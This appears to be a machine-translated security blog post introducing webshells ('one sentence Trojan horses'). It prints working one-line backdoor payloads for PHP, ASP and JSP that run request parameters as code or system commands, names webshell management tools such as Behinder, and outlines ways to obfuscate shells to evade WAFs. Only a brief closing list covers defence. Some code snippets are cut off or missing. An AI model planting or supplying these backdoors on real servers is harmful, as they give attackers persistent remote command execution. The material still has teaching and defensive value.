Webshell one sentence Trojan horse

Keywords: Web Security

Introduction to Webshell

What is a WebShell

  • webshell is a command execution environment in the form of web page files such as asp, php, jsp or cgj, which can also be called a web page back door

  • Because Web shell mostly appears in the form of dynamic script, it is also called the back door tool of the website

  • Attackers can use webshell to control the web server for a long time and gain the right to execute operations

Webshell classification

In a word, the execution process of Trojan horse

Common code execution functions in PHP

  • Relationship between executive function and Webshell

    • PHP functions that can execute code are often used to write a one sentence Trojan horse. Therefore, this paper summarizes the code execution functions
  • Common code execution functions in PHP

  • eval(), assert(), preg_replace(),create_function()

    • array_map(),call_user_func(), call_user_func_array(),array_filter()
  • Command execution function

    • system(),exec(), popen(), passthru(), shell_exec(),`

PHP Webshell

The functions supported by various versions of php are as follows

  • 5.x : eval / assert / preg_replace /e /create_function

  • 7.x : eval / assert

  • 8.x : eval

Common PHP function version Webshell

**// eval() function** 
<?php eval($_REQUEST["cmd"]);?>

**// assert() function** 
<?php assert($_REQUEST["cmd"]);?>

**// preg_replace() function** 
<?php @preg_replace("/abc/e",$_REQUEST['cmd'],"abc");?>

**// create_function() function** 
  $func = create_function('',$_REQUEST['cmd']);

**// array_map() function** 

**// array_filter function** 

PHP 4 markup styles

php, like several other web languages, uses a pair of tags to contain php code to distinguish it from html code. There are four tag styles in php

  1. xml style (recommended for standard style)
  echo "This is xml Style mark"; 
  • xml style tags are common tags and recommended tags. They cannot be disabled by the server. They can be used in both xml and xhtml.
  1. Script style
<script languange="php"> 
  echo'This is a script style tag';  
  1. Short label style
<? This is a short style mark; ?> 

Note: you need to enable short in the php.ini configuration file_ open_ Tag = on, off by default

  1. asp style
  echo 'This is asp Style mark';  

Note: you need to enable ASP in the php.ini configuration file_ Tags = on, off by default

  • Note: short tags should be avoided in the following cases: developing programs or libraries that need to be distributed, or developing on servers beyond the control of users. Because the target server may not support short tags. For code migration and distribution, be sure not to use short tags.

Webshell in other languages

asp language Webshell

// The kitchen knife can be connected to the Webshell
<%eval request("cmd")%>
<%execute request("cmd")%>
<%executeGlobal request("cmd")%>
<%eval(Request(chr(35)))%> # ASCII code value

// WebShell that can execute system commands
<%response.write server.createobject("wscript.shell").exec("cmd.exe /c "&request("cmd").stdout.readall%>

aspx language Webshell

<%@ Page Language="Jscript"%>

<%@ Page Language="Jscript" validateRequest="false" %>

jsp language Webshell

// Execute system commands with echo
<% if("023".equals(request.getParameter("pwd"))){java.io.InputStream in =
Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();int a = -1;byte[]b= new byte[2048];
    out.println(new String(b,0,a));

Webshell management tools

  • Why use the webshell administration tool?

When an attacker invades a website, he usually writes to the Webshell in various ways to obtain the control authority of the server, such as executing system commands, reading configuration files and so on

  • Common webshell management tools

Ant sword

Knife C (Knife)

  • This is a cross platform profile based Chinese kitchen knife, which gives all operations to users to define

Ice scorpion (Behinder)

  • A dynamic binary encryption website management client

  • At present, the latest version of "ice scorpion" is v3.0, and its compatibility has been improved day by day. Encryption no longer depends on PHP opens $! Exhibition function, and supports simple ASP

  • The main functions include virtual terminal, socks agent, file management, rebound she! Database management, powerful

  • github project address: https://github.com/rebeyond/behinder/releases

  • Four functions of Webshell management tool

Webshell deformation

Deformation purpose

  • waf usually uses keywords to determine whether it is a one sentence Trojan horse, but there are many variants of a one sentence Trojan horse, and waf cannot intercept all of them

  • If you want to bypass waf, you need to master various PHP tips and combine them to design your own one sentence Trojan horse

Deformation method

  1. Using str_replace() function

  1. Using base64_decode() function

  1. Using the '.' operator

  1. Replace data source

  1. Substitute label

  1. String combination method to hide keywords

  1. Other deformation

Webshell deformation summary

Bypass technique

  1. Replace execution data source

  2. Character replacement or encoding

  3. Take covert measures

WebShell defense skills

  1. Use and update protective tools or products in time

  2. Set strict read and write permissions on the server's folders

  3. Disable some sensitive and dangerous functions in the server, such as command execution system()

  4. Regularly check the system process to see if there are suspicious processes

  5. Observe whether there is a newly created executable file in the system directory according to the creation date of the file

Posted by a1ias on Sat, 06 Nov 2021 06:17:05 -0700